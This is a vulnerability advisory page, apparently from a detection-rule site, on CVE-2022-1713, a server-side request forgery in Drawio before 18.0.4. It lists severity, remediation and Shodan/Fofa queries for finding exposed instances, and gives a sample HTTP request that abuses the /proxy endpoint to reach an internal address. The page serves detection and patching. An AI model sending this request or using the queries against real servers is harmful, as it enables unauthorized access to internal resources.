🔙 목록으로 돌아가기

CVE-2022-1713: Drawio <18.0.4 - Server-Side Request Forgery

TitleDrawio <18.0.4 - Server-Side Request Forgery
Authorpikpikcu
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage.
RemediationUpgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability.
CVSS Score7.5
EPSS Score0.89884
CVE IDCVE-2022-1713
CWE IDCWE-918
Shodan Queryhttp.title:"Flowchart Maker"http.title:"flowchart maker"
Fofa Querytitle="flowchart maker"
Tags cve cve2022 drawio ssrf oss huntr diagrams vuln

🔍 Vulnerability Description

Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.

🌐 HTTP Request

GET /proxy?url=http%3a//0:8080/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1713.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1713.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A